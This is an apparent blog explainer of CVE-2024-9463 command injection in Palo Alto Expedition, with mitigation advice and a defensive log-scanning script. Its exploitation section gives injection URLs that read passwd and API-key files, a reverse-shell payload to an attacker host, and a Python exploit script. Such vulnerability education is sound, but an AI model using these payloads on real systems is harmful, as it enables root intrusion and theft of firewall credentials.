CVE-2024-9463 - Exploiting Command Injection in Palo Alto Networks Expedition to Reveal Root Secrets
In October 2024, a serious vulnerability was disclosed in Palo Alto Networks Expedition, the migration and best practice assessment tool for Palo Alto firewalls. Tracked as CVE-2024-9463, this OS command injection flaw doesn't just let an attacker run code: they can do it *as root*, without authentication, and read the data Expedition stores, including usernames, cleartext passwords, device configurations and the API keys of the PAN-OS firewalls it manages. This article breaks down the issue, how it is exploited, and why you need to fix it, in plain language for anyone wanting to understand the risk.
What is Palo Alto Networks Expedition?
Expedition is a migration and transformation tool. Security engineers use it to convert firewall configurations from other vendors into PAN-OS configurations and to assess existing PAN-OS configurations against best practices. To do that job it stores credentials and API keys for every firewall it has been pointed at, which is what makes a root-level compromise of the Expedition host so damaging.
Original Advisory & References
- NVD: CVE-2024-9463
- Palo Alto Security Advisory
- Talos Report
How the Vulnerability Works
Expedition exposes several backend PHP scripts that place *user-supplied input* directly into shell command strings, something that is always risky: any character the shell treats as an operator (a semicolon, a pipe, a backtick or $(...)) ends the intended command and starts the attacker's.
Example vulnerable code segment (simplified for clarity; this is the pattern, not Expedition's actual source)
```php
<?php
// A PHP snippet that follows the same pattern as the bug
if (isset($_GET['devicename'])) {
    $name = $_GET['devicename'];
    // BAD: $name comes straight from the user and is concatenated into a shell command
    system("cli_tool --import " . $name);
}
?>
```
The standard fix for this pattern is to wrap the value in escapeshellarg(), which single-quotes it so the shell sees exactly one argument, and ideally to validate it against an allowlist first. If escapeshellarg is missing or used incorrectly (applied to only part of the string, or to a value that is later handed to a second shell), an attacker can manipulate devicename to inject arbitrary OS commands, like:
http://expedition.example.com/path/to/script.php?devicename=router1;cat%20/etc/passwd
This would run
cli_tool --import router1;cat /etc/passwd
The shell treats the semicolon as a command separator, so cat /etc/passwd (or worse, cat /home/user/secret.conf, or any other file on the box) runs as ROOT, because Expedition executes these scripts with root privileges.
Exploitation Steps
(The hostnames, ports, script paths and parameter names below are illustrative; substitute the vulnerable endpoint you actually identify.)
1. Find the Vulnerable Endpoint: Tools like dirsearch, ffuf, or Burp Suite can help you enumerate Expedition's PHP scripts and input forms and spot parameters that end up in shell commands.
2. Inject OS Commands: Insert a semicolon (;), a pipe (|) or a back-tick (`) followed by the desired command into the vulnerable parameter. Example:
```
http://expedition.target:808/api/import.php?devicename=main;id
```
3. Extract Sensitive Files: The following files are of high value:
- /var/www/html/API_KEY.conf *(stores firewall API keys)*
- /var/www/html/USERS.txt *(stores usernames/passwords)*
- /etc/passwd and /etc/shadow
```
http://expedition.target:808/api/import.php?devicename=main;cat%20/var/www/html/API_KEY.conf
```
A reverse shell works the same way. The payload is bash -i >& /dev/tcp/attacker_ip/4444 0>&1, but the spaces, > and & characters must be URL-encoded, otherwise the & splits the query string before the script ever sees the command:
```
http://expedition.target:808/api/import.php?devicename=main;bash%20-i%20%3E%26%20/dev/tcp/attacker_ip/4444%200%3E%261
```
Here's a minimal exploit using requests to automate the file read (the target URL and parameter are the illustrative ones from above):
```python
import requests

# Illustrative endpoint and parameter; replace with the vulnerable one you identified
target = "http://expedition.target:808/api/import.php"
payload = "main;cat /var/www/html/API_KEY.conf"
params = {"devicename": payload}  # requests URL-encodes the payload for us

r = requests.get(target, params=params, timeout=10)
print("[*] HTTP status:", r.status_code)
print("[*] Response Output:\n", r.text)
```
4. Harvest All Device Secrets: Passwords, configs, and API keys are recoverable.
5. Pivot to Firewalls: With API keys and passwords, attackers can modify firewall rules or create new backdoors in production.
Mitigation
- Patch Immediately: Palo Alto Networks fixed this in Expedition 1.2.96, released in October 2024 alongside the advisory. Download it from their Expedition Release Page.
- Rotate Secrets: Treat every username, password and firewall API key that Expedition has stored as compromised; change them on the firewalls and in Panorama after upgrading.
- Restrict Network Access: Only allow trusted admins to reach Expedition, over a VPN or via firewall rules, and never expose it to the internet.
- Audit for Exposure: Check the web server logs for requests carrying shell metacharacters in their parameters, and check firewall and Panorama audit logs for unexpected admin accounts, API keys or rule changes.
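As an added example for the audit step (my own code, not from the article or from Palo Alto Networks), the following script scans web server access logs for query parameters that decode to shell metacharacters, which is what the injection requests above look like on the wire. The log lines are constructed Apache combined-format samples, and the /api/import.php path and devicename parameter are the article's illustrative names, not Expedition's real endpoint.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (not real Expedition logs). The
# script path and parameter are the article's illustrative ones.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2024:08:15:02 +0000] "GET /api/import.php?devicename=router1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2024:08:16:41 +0000] "GET /api/import.php?devicename=main%3Bcat%20/etc/passwd HTTP/1.1" 200 2048 "-" "python-requests/2.31.0"
203.0.113.9 - - [10/Oct/2024:08:17:05 +0000] "GET /api/import.php?devicename=main%3Bbash%20-i%20%3E%26%20/dev/tcp/203.0.113.9/4444%200%3E%261 HTTP/1.1" 500 0 "-" "curl/8.4.0"
10.0.0.7 - - [10/Oct/2024:09:00:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2024:09:05:13 +0000] "GET /api/import.php?devicename=fw-core-01.example.com HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell operators and substitution syntax an attacker needs to chain a command.
SHELL_META_RE = re.compile(r"[;|&`\n]|\$\(|\$\{|/dev/tcp/")


def suspicious_values(target: str) -> list[tuple[str, str]]:
    """Return (parameter, decoded value) pairs in the query string that contain shell metacharacters."""
    query = urlsplit(target).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; decode again to catch double encoding
            if SHELL_META_RE.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_log(text: str) -> list[dict]:
    """Flag requests whose query parameters look like command injection attempts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, value in suspicious_values(m["target"]):
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": urlsplit(m["target"]).path,
                "param": param,
                "value": value,
                "status": int(m["status"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']!r} -> HTTP {f['status']}")
```

On the sample it flags the two requests from 203.0.113.9 (the file read and the reverse shell) and leaves the legitimate device names alone. Two caveats: access logs only record GET query strings, so a payload sent in a POST body will not appear here, and an attacker who has already obtained root can edit the logs; treat a clean result as one signal, not proof, and combine it with the firewall-side review of accounts, API keys and rule changes.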
Conclusion
CVE-2024-9463 is trivial to exploit, and with the power to leak every device secret and change your entire firewall stack, the risk can't be overstated. If you're running Expedition, patch NOW and rotate all secrets to stay safe.
Links
- Expedition Home
- NVD Entry: CVE-2024-9463
- Palo Alto Security Advisory
- Tenable Blog: Palo Alto Expedition Command Injection *(if available)*
Keep your migration tools safe—they hold the keys to the kingdom. If you found this helpful, consider reviewing your other security tooling for similar risky behaviors!
Timeline
Published on: 10/09/2024 17:15:19 UTC
Last modified on: 11/15/2024 02:00:01 UTC